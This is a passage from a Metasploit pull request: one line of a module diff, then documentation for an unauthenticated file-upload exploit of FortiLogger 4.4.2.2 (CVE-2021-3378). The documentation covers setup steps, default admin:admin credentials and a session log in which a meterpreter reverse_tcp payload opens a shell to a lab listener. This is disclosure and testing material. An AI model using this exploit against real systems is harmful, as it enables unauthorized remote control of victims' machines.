+    fail_with(Failure::UnexpectedReply, 'Failed to execute the payload')
   end
 end


### PR DESCRIPTION
## Vulnerable Application

FortiLogger is a web-based logging and reporting software designed specifically for FortiGate firewalls,
running on Windows operating systems. It contains features such as instant status tracking, logging, search / filtering,
reporting and hotspot.

This module exploits an unauthenticated arbitrary file upload via insecure `POST` request on company logo upload
for hotspot settings of FortiLogger 4.4.2.2.

You can download installation file from following url:
https://github.com/erberkan/erberkan.github.io/raw/master/2021/cve-2021-3378/Fortilogger-4.4.2.zip

*(Vendor has removed vulnerable version from web page of vendor for download.)*

### Prerequisites

1. Start a Windows VM *(Tested on Windows 10 Enterprise)*
2. Install a vulnerable version which is 4.4.2.2 of FortiLogger via above url. *(Vendor has removed this version on
   their web page)*
3. After installation, verify that the server is working by visiting it with a browser.
    - Default port: 5000
    - Default username:password - admin:admin


## Verification Steps

1. Install the application
1. Start msfconsole
2. Do: `use exploit/windows/http/fortilogger_arbitrary_fileupload`
3. Set `RHOSTS`
4. Do: `run` or `exploit`
5. **Verify** that `The target is vulnerable.` message appeared
6. **Verify** that payload uploaded to target system successfully: `Payload has been uploaded !`
7. **Verify** that you getting a meterpreter session.

## Options

1.  `RHOSTS`. IP address or FQDN of target system that is FortiLogger 4.4.2.2 is running on it.
2.  `RPORT`. Default port number is `5000`.


## Scenarios

```
msf6 > use exploit/windows/http/fortilogger_arbitrary_fileupload 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > show options 

Module options (exploit/windows/http/fortilogger_arbitrary_fileupload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      5000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the FortiLogger
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.46     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   FortiLogger - 4.4.2.2


msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > set rhosts 192.168.16.128
rhosts => 192.168.16.128
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run

[*] Started reverse TCP handler on 192.168.1.46:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[+] Generate Payload !
[+] Payload has been uploaded !
[*] Executing payload...
[*] Sending stage (175174 bytes) to 192.168.1.46
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.46:59563) at 2021-03-01 00:40:26 +0300

meterpreter > getuid
Server username: DESKTOP-QFNKFIO\brkn
meterpreter > sysinfo 
Computer        : DESKTOP-QFNKFIO
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > pwd
C:\Program Files\RZK\Fortilogger\App
meterpreter > 


```

## Reference
1. https://erberkan.github.io/2021/cve-2021-3378/
